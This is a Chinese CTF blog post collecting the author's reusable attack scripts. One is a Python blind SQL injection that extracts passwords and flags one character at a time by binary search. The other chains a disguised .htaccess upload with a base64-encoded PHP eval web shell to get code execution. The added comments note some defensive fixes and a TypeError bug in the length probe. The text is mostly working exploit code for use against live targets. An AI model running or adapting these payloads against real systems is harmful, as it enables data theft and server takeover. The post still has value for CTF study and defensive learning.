常用脚本

记录一下常用的一些脚本

SQL 二分盲注

import requests
from time import sleep

# Target endpoint for the boolean probes (the host is a per-instance CTF name)
# and a local HTTP proxy so every request can be inspected while it runs.
url = "http://8fd845b8-4242-4441-ab34-57c8386d5faf.node3.buuoj.cn/backend/content_detail.php"
proxies = dict(http="127.0.0.1:8080")
def attack(cur, mid=""):
    """Boolean oracle for one blind-injection probe against ``url``.

    Builds the injected expression for character position ``cur`` and
    threshold ``mid``, sends it as the ``id`` query parameter through the
    local proxy, and reports whether the response body contains the word
    "content".

    Args:
        cur: 1-based character position passed to ``substr``.
        mid: ASCII threshold compared with ``>``. The default ``""`` does not
            fit a ``%d`` placeholder, so calling ``attack(i)`` with the
            payload that is active below raises ``TypeError``; only the
            commented-out length payloads take a single argument.

    Returns:
        True when "content" appears in the response text, otherwise False.
    """
    # Earlier payload variants kept for reference.
    # payload = "if(ascii(substr((select(flag)from(flag)),%d,1))>%d,1,0)" % (cur, mid)
    # payload = " or length((select group_concat(password) from users))={}#".format(cur)
    # At first I wrote '#' as '%23' and it never worked; later I remembered
    # that Python encodes the parameter automatically...
    # payload = " or if(ascii(substr((select group_concat(password) from users),%d,1))>%d,1,0)#" % (cur, mid)
    # payload = "0^(ascii(substr(((select(group_concat(column_name))from(information_schema.columns)where(table_schema=database()))),%d,1))>%d)" % (cur, mid)
    payload = "0^(ascii(substr((select(group_concat(password))from(admin)),%d,1))>%d)" % (cur, mid)
    data = {
        "id": payload
    }
    # Every probe goes through 127.0.0.1:8080 (module-level ``proxies``).
    res = requests.get(url, params=data, proxies=proxies)
    # print(res.text)
    # 429 means the server is throttling. The script only prints a warning and
    # still evaluates the body below, so a throttled probe is likely misread as
    # False. Rate limiting of this kind is also one of the few server-side
    # signals that a character-by-character oracle is running; the durable fix
    # is a parameterised query for ``id``.
    if res.status_code == 429:
        print('too fast')
    # Presence of "content" in the page is the TRUE branch of the oracle.
    if "content" in res.text:
        return True
    else:
        return False


def try_length():
    """Probe lengths 1..9 with ``attack(i)`` and print the first accepted one.

    A 20 ms pause follows each rejected probe and the loop stops at the first
    hit. With the payload currently active in ``attack`` the single-argument
    call does not fill both ``%d`` placeholders, so this helper only works
    together with the commented-out length payloads.
    """
    candidate = 1
    while candidate < 10:
        if attack(candidate):
            print(candidate)
            return
        sleep(0.02)
        candidate += 1

def main():
    """Recover 21 characters of the target value, one binary search per position.

    For positions 1..21 the candidate range [31, 127] is halved with ``attack``
    until ``start == end``; the surviving code is appended to ``flag`` and the
    partial result is printed after every character.
    """
    flag = ""
    for i in range(1, 22):  # hard-coded length: 21 characters
        end = 127
        start = 31
        mid = (end + start) // 2
        # Invariant: the character code lies in [start, end]. A True oracle
        # means code > mid; False means code <= mid.
        while end > start:
            if attack(i, mid):
                start = mid + 1
            else:
                end = mid
            mid = (end + start) // 2
            # 20 ms between probes; about seven requests per character, all
            # differing only in the ``id`` parameter -- the burst pattern a
            # server-side monitor would see.
            sleep(0.02)
        flag += chr(mid)
        print(flag)

if __name__ == "__main__":
    # Length probe left disabled; main() assumes 21 characters.
    # try_length()
    main()

SSTI 判断图

.htaccess 上传 getshell

import requests
import base64

# Upload endpoint with the author's request-parameter payload; host and
# parameter values are specific to this CTF instance.
url = r"http://2eab5f94-4cfd-41dc-ac5d-6cda977d7ce4.node3.buuoj.cn//?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=get_the_flag"

# Six bytes prepended to both uploads; the commented XBM header is an earlier
# variant. Presumably this satisfies an image check on the upload handler --
# TODO confirm against the target's check. Defensive note: a header or
# magic-byte check says nothing about the rest of the file; the controls that
# hold are storing uploads outside the web root, renaming to a fixed safe
# extension, and ``AllowOverride None`` so an uploaded .htaccess is ignored.
# SIZE_HEADER = b"#define width 1\n#define height 1\n\n"
SIZE_HEADER = b"\x00\x00\x8a\x39\x8a\x39"
# Sent as ".htaccess" with an image content type. The directives make Apache
# treat .cc files as PHP and prepend the base64-decoded shell.cc to every
# request in that directory -- which is exactly why per-directory overrides
# must stay disabled for upload folders. The tmp_... path is the author's
# instance-specific upload directory.
htaccess = SIZE_HEADER + b"""
AddType application/x-httpd-php .cc
php_value auto_prepend_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_2c67ca1eaeadbdc1868d67003072b481/shell.cc"

"""
files = [
    ("file",(".htaccess", htaccess, "image/gif"))
]
proxy = {"http": "127.0.0.1:8080"}  # local proxy for inspecting the upload
res = requests.post(url, files=files, proxies=proxy).text
print(res)

# Second upload: the same 6-byte header, two filler bytes, then a base64
# encoded PHP one-liner. An ``eval`` of a request parameter is a textbook web
# shell; the .htaccess above is what makes the .cc extension executable.
shell = SIZE_HEADER + b"00" + base64.b64encode(b"<?php eval($_GET['cjm00n']);?>")
files = [
    ("file",("shell.cc", shell, "image/gif"))
]
proxy = {"http": "127.0.0.1:8080"}
res = requests.post(url, files=files, proxies=proxy).text
print(res)


作者: cjm00n
地址: https://cjm00n.top/CTF/useful-scripts.html
版权声明: 除特别说明外,所有文章均采用 CC BY 4.0 许可协议,转载请先取得同意。

